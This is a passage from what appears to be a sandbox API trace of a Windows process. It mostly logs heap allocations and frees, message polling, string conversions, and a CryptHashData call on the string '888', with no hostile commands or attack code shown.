Size=0x10) returned 0x2e51d60 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e68 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0269.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0269.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0269.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0269.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.171] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0269.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51d18, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0269.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0269.172] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0269.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.172] CryptHashData (hHash=0xa875d0, pbData=0x2e54e68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0269.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0269.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0269.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0269.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0269.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0269.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0269.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0269.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0269.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0269.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0269.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d60 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.176] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0269.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0269.178] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51da8 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0269.178] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0269.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0269.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) 